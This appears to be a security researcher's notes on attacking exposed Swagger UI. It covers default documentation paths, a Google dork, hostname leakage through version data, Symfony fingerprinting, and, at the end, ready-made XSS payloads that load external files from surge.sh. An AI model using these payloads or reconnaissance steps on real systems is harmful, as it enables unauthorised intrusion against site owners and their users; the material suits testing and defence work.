SwaggerUI
Swagger UI is an API documentation for a user to easier understand the inner functions of an API. This does not mean that it's bad, but it could reveal sensitive information and because an attacker may understand the API and see all the endpoints and functions, it may therefore be easier to exploit!
One could, for instance, find an endpoint saying that sending a GET request towards /api/B47DahG539DdY32A/users may expose all users within the API completely unauthenticated if the victim doesn't check for an authentication.
If one were to look into Swagger UI Snyk vulnerabilities, one may see that all Swagger UI's are vulnerable all the way up to version 4.1.2.
Directories
When researching this, it seem like there aren't any "exact" default path's for the documentation. It may be different on every application. In the list below are a few I've encountered and are included in my swagger.txt wordlist
/swagger/index.html
/swagger/index.jsp
/v2/swagger.json
/swagger.yaml
/swagger
/api
/api/doc
/docs
/docs/index.php
/swagger-ui.html
This can also be renamed to something, but usually after any /api/ directory
/api/renamed/swagger
Google Dorking/Hacking
This will find you Swagger UI. Change example.com to target website
intext:"Swagger UI" intitle:"Swagger UI" site:example.com
Swagger UI Version Check and Internal Hostname
What I discovered on an application is that, if successful, is a potential internal hostname disclosed.
This came from the JS file /swagger-ui/swagger-ui-bundle.js which was called upon, due to swagger UI component being loaded, with the paylaod below (see this GITHUB ISSUE for info):
JSON.stringify(versions)
Here is an Internal hostname, but because it is an old webserver, it exposes the internal IPv4 address due to the developers naming it like this (It was not uncommon to name the internal hostname the local IPv4 address "back in the olden days"):
If you notice that multiple swaggers have the same hostname, it may be that the admin have used a docker and therefore most likely may have the same internal hostname as other people using the same docker.
Potential CMS fingerprinting
When researching where the above values came from, I noted these two URL paths coming from 2 different websites (same customer).
Take specifically note of the nelmioapidoc and apiplatform values.
When googling on them, it mentions Symfony CMS and therefore may be a way to fingerprint Symfony (Needs more research):
/bundles/nelmioapidoc/swagger-ui/swagger-ui-bundle.js
/bundles/apiplatform/swagger-ui/swagger-ui-bundle.js
This "disclosure" may not be on every Swagger UI documentation. The JS files may need more research. But as of now, I have seen it on a couple of Swagger Documentations and it "seems" to be by default!
XSS
Sometimes there are risks having Swagger UI. Here are some ways to Exploit an XSS! By appending the following parameter and an externally hosted YML file, to the swagger API, it is possible to perform an XSS:
?configUrl=https://jumpy-floor.surge.sh/test.json
?url=https://jumpy-floor.surge.sh/test.yaml
?configUrl=data:text/html;base64,ewoidXJsIjoiaHR0cHM6Ly9leHViZXJhbnQtaWNlLnN1cmdlLnNoL3Rlc3QueWFtbCIKfQ==